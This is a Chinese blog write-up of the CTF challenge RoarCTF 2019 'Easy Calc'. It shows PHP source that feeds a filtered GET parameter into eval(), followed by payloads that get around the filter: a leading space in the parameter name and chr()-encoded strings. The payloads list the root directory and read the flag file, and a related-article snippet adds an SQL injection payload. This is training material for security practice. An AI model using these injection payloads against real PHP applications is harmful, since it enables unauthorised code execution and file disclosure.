buu web每日一题之[RoarCTF 2019]Easy Calc

最新推荐文章于 2022-12-01 21:55:59 发布
最新推荐文章于 2022-12-01 21:55:59 发布
阅读量142 收藏
点赞数 1
分类专栏: # web之每日一题 buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shannidawang/article/details/119040888
版权

查看源码 提示看calc.php

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

经过测试 num不能传入字母

WAF问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF
这里利用PHP的字符串解析特性来绕过WAF
知识点(大佬讲的非常清楚了属于是

接下来 扫描该目录下的所有文件

? num=print_r(scandir('/'));  //但由于黑名单把'过滤了所以改为

? num=print_r(scandir(chr(47)));

在这里插入图片描述
读取该目录下文件内容

? num=print_r(file_get_contents('/flagg'))
#/=chr(47),f=chr(102),l=chr(49),a=chr(97),g=chr(103),g=chr(103)来

? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述

samh1777
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RoarCTF 2019] web题-Easy Calc
BROTHERYY的博客
06-29 295
//复现地址:https://buuoj.cn/challenges 打开环境以后是一个简易计算器,从页面源代码发现了calc.php文件,该页面告诉我们有waf。 calc.php是一个过滤,过滤完成后执行eval函数 这里利用php字符串解析特性在变量前面加上空格 ? num=phpinfo 了解下scandir()函数 定义:scandir() 函数返回指定目录中的文件和目录的数组。 语法:scandir(directory,sorting_order,context); 参数 描述
[RoarCTF 2019]Easy Calc
xj28555的博客
09-02 350
进入题目是一个计算器的功能界面 查看源代码,可以发现是有WAF的,且存在一个calc.php文件 这里接收一个num参数,可以看到这里创建了一个黑名单列表,然后用正则是去匹配,进行非法参数的过滤。 那这题就是要绕过这个过滤和过一个WAF了。先传入一个?num=1测试一下。 传入字母就会报错,这里应该是被WAF文件给拦截了。 要对这WAF进行绕过,这里就涉及到一个知识点了。 PHP的字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)转换
[RoarCTF 2019]Easy Calc 1
xixixihan的博客
12-01 486
做题记录
BUU刷题记录——5
weixin_43610673的博客
09-21 1499
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
RoarCTFweb题解
st0ut的博客
10-21 1769
前言 参加了RoarCTF,题目质量挺好的,学到了一些东西。在这里复现记录一下。 easy_calc 打开题目发现是一个计算器的功能,感觉计算器已经出过好多次了。查看源代码,发现了calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $st...
去除字符串中的特殊字符('\t', '\n', '\v', '\f', '\r')
giantmfc123
03-04 7196
判断字符是否是特殊字符 bool QChar::isSpace() const 去除开头结尾中间的特殊字符,中间只留一个空格 QString str = " lots\t of\nwhitespace\r\n "; str = str.simplified(); // str == "lots of whitespace"; 只去除开头结尾的特殊字符 QString st...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
WebAssembly(简称WASM)是一种低级的虚拟机指令集,设计用于在现代网络浏览器中运行,以提供接近原生代码的速度。它被广泛应用于游戏开发、3D渲染、科学计算以及任何需要高性能计算的Web应用程序。在"BUU-Reveser-...
Roarctf Easy Calc引起对http走私和分块传输绕过waf的思考
qq_23066945的博客
11-06 574
Roarctf Easy Calc引起对http走私和分块传输绕过waf的思考(搬运) 原创: 星盟安全团队 星盟安全 原文链接:https://mp.weixin.qq.com/s/fsMLNHiyd1_tQkz9wTRhMg 之前在做roarctf第一个web时候读到过关于php解析漏洞的文章。 https://www.freebuf.com/articles/web/213359.htm...
BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
algae
08-13 1977
BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 806
目录[HCTF 2018]WarmUp[强网杯 2019]随便注[护网杯 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客大挑战 2019]EasySQL[强网杯 2019]高明的黑客[极客大挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
几道web题简单总结
weixin_30868855的博客
04-28 170
拖了好长时间,总结一下这一段时间做的几道值得记录一下的题目,有的没做出来,但是学习到了新的东西 1.homebrew event loop ddctf的一道题目,学到了python eval函数的用法,首先分析题目: # -*- encoding: utf-8 -*- # written in python 2.7 __author__ = 'garzon' from fl...
2019全国大学生信息安全竞赛部分Web writeup
weixin_30695195的博客
04-23 1145
JustSoso 0x01 审查元素发现了提示,伪协议拿源码 /index.php?file=php://filter/read=convert.base64-encode/resource=index.php 1 <?php 2 error_reporting(0); 3 $file = $_GET["file"]; 4 $payload = $_GET["...
[RoarCTF 2019]Easy Calc(WAF PHP的字符串解析特性bypass)
xlcvv的博客
04-30 328
进入题目: 有回显答案,使了一下: 老规矩F12: 有个calc文件,进去瞅瞅: 给了一些源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t...
三亚学院考研,30个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
最新发布
07-15
三亚学院考研,30个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值